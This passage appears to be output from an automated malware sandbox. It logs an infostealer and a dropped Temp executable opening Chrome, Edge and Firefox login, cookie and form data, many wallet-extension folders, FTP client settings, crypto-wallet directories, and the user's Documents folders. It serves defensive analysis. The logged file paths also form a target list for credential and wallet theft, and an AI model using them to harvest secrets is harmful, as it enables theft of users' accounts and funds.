Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
